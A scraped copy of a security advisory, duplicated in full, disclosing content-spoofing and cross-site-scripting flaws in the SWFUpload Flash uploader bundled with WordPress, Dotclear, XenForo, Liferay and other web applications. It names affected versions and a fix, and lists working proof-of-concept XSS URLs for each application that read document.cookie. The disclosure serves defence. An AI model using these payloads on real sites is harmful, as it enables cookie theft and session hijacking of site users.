Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
来源:互联网 发布:php入门很简单 pdf 编辑:程序博客网 时间:2024/05/02 00:08
Hello list!
Earlier I've wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html). This
is very popular flash-file, which is used at tens millions of web sites and
in hundreds of web applications (only WordPress is used at more then 62
millions of web sites according to wordpress.com).
Last year I've wrote about other XSS hole in SWFUpload and I mentioned that
there are many web applications with vulnerable SWFUpload. All of them are
vulnerable to these new vulnerabilities, except swfupload.swf bundled with
WordPress since version 3.3.2.
There are different names of files of SWFUpload: swfupload.swf,
swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf and swfupload_f11.swf.
Many web applications include few swf-files of SWFUpload. Not all of these
swf-files are vulnerable to new holes: swfupload_f8.swf and swfupload_f9.swf
are not vulnerable (they have no buttonText functionality according to my
research).
So from those web applications the next are vulnerable (plus many other web
applications):
swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin,
SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.
swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE,
Liferay Portal (Community Edition and Enterprise Edition), Swfupload for
Drupal, SWFUpload for Codeigniter, SentinelleOnAir.
swfupload_f11.swf - SentinelleOnAir.
Also InfoGlue is vulnerable (about XSS vulnerability in ZeroClipboard.swf in
which I've wrote last month), because it has SWFUpload too.
-------------------------
Affected products:
-------------------------
Vulnerable are all web applications with SWFUpload (v2.2.0.1 and previous
versions).
Vulnerable are versions WordPress 2.7 - 3.3.1 (which bundled with
swfupload.swf). The fixed version of swfupload.swf in WP 3.3.2 contain fix
as for previous XSS, as for these CS and XSS vulnerabilities (even WP
developers didn't write about it).
Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay
Portal (Community Edition, which earlier called Standard Edition, and
Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and
SentinelleOnAir. There is no information that they have fixed these
vulnerabilities in their software (at that these holes were fixed together
with another XSS hole in WordPress 3.3.2 at 20.04.2012).
Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions. They
used the same swf-file, as in WP 3.3.2, so it contains a fix as for previous
XSS, as for these CS and XSS vulnerabilities (even XenForo developers didn't
write about it, because they didn't know that, since WP developers did it
secretly).
-----
Fix:
-----
Use swfupload.swf from WordPress 3.3.2 and higher versions. All web
developers need to update their vulnerable version of SWFUpload to this
fixed version.
----------
Details:
----------
There are two vulnerabilities in SWFUpload.
Content Spoofing (WASC-12):
http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
It's possible to inject text, images and html (e.g. for link injection).
Cross-Site Scripting (WASC-08):
http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Code will execute after click. It's strictly social XSS.
These are examples of XSS vulnerability in different web applications:
WordPress:
http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dotclear:
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
XenForo:
http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InstantCMS:
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
AionWeb:
http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dolphin:
http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SwfUploadPanel for TYPO3 CMS:
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Archiv plugin for TinyMCE:
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Liferay Portal:
http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Swfupload for Drupal:
As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.
http://site/js/libs/swfupload_f10.swf
SWFUpload for Codeigniter:
http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SentinelleOnAir:
http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InfoGlue:
Previous XSS vulnerabilities:
http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
New XSS vulnerability:
http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Earlier I've wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html). This
is very popular flash-file, which is used at tens millions of web sites and
in hundreds of web applications (only WordPress is used at more then 62
millions of web sites according to wordpress.com).
Last year I've wrote about other XSS hole in SWFUpload and I mentioned that
there are many web applications with vulnerable SWFUpload. All of them are
vulnerable to these new vulnerabilities, except swfupload.swf bundled with
WordPress since version 3.3.2.
There are different names of files of SWFUpload: swfupload.swf,
swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf and swfupload_f11.swf.
Many web applications include few swf-files of SWFUpload. Not all of these
swf-files are vulnerable to new holes: swfupload_f8.swf and swfupload_f9.swf
are not vulnerable (they have no buttonText functionality according to my
research).
So from those web applications the next are vulnerable (plus many other web
applications):
swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin,
SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.
swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE,
Liferay Portal (Community Edition and Enterprise Edition), Swfupload for
Drupal, SWFUpload for Codeigniter, SentinelleOnAir.
swfupload_f11.swf - SentinelleOnAir.
Also InfoGlue is vulnerable (about XSS vulnerability in ZeroClipboard.swf in
which I've wrote last month), because it has SWFUpload too.
-------------------------
Affected products:
-------------------------
Vulnerable are all web applications with SWFUpload (v2.2.0.1 and previous
versions).
Vulnerable are versions WordPress 2.7 - 3.3.1 (which bundled with
swfupload.swf). The fixed version of swfupload.swf in WP 3.3.2 contain fix
as for previous XSS, as for these CS and XSS vulnerabilities (even WP
developers didn't write about it).
Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay
Portal (Community Edition, which earlier called Standard Edition, and
Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and
SentinelleOnAir. There is no information that they have fixed these
vulnerabilities in their software (at that these holes were fixed together
with another XSS hole in WordPress 3.3.2 at 20.04.2012).
Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions. They
used the same swf-file, as in WP 3.3.2, so it contains a fix as for previous
XSS, as for these CS and XSS vulnerabilities (even XenForo developers didn't
write about it, because they didn't know that, since WP developers did it
secretly).
-----
Fix:
-----
Use swfupload.swf from WordPress 3.3.2 and higher versions. All web
developers need to update their vulnerable version of SWFUpload to this
fixed version.
----------
Details:
----------
There are two vulnerabilities in SWFUpload.
Content Spoofing (WASC-12):
http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
It's possible to inject text, images and html (e.g. for link injection).
Cross-Site Scripting (WASC-08):
http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Code will execute after click. It's strictly social XSS.
These are examples of XSS vulnerability in different web applications:
WordPress:
http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dotclear:
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
XenForo:
http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InstantCMS:
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
AionWeb:
http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dolphin:
http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SwfUploadPanel for TYPO3 CMS:
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Archiv plugin for TinyMCE:
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Liferay Portal:
http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Swfupload for Drupal:
As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.
http://site/js/libs/swfupload_f10.swf
SWFUpload for Codeigniter:
http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SentinelleOnAir:
http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InfoGlue:
Previous XSS vulnerabilities:
http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
New XSS vulnerability:
http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
- Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
- Multiple vulnerabilities in XAMPP
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
- [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
- Multiple vulnerabilities in Cacti 0.8.8b and lower
- Using multiple UIWindows in iOS applications
- Using multiple UIWindows in iOS applications
- [waraxe-2012-SA#084] - Multiple Vulnerabilities in OpenCart 1.5.2.1 漏洞
- Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
- Mixing JSTL and JSF in Web Applications
- Dynamic Data in Regular Websites/Web Applications
- Consuming XML Web Services in iPhone Applications
- Two vulnerabilities in Simple HTTPD 1.38
- Privilege escalation vulnerabilities in Nagios XI installer
- Checking For Vulnerabilities in Path Fragments
- Kernel Vulnerabilities in the Samsung S4
- redhat 5安装 oracle 10g
- 浅谈LWIP对齐问题
- android 手机设备唯一标识
- 修改Oracle目录权限造成ORA-12537
- VC 屏蔽ESC,ENTER
- Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
- CF-48E. Ivan the Fool VS Gorynych the Dragon(bfs+dfs+判重回路)
- 可以让你少奋斗10年的工作经验
- 三星星空大赛宣传活动正式启动
- java synchronized
- EAS BOS MsgBox使用大全
- [Matlab]如何随机产生信息码元矩阵u
- Java桌面程序打包成exe可执行文件
- 可以下载专利文献的网址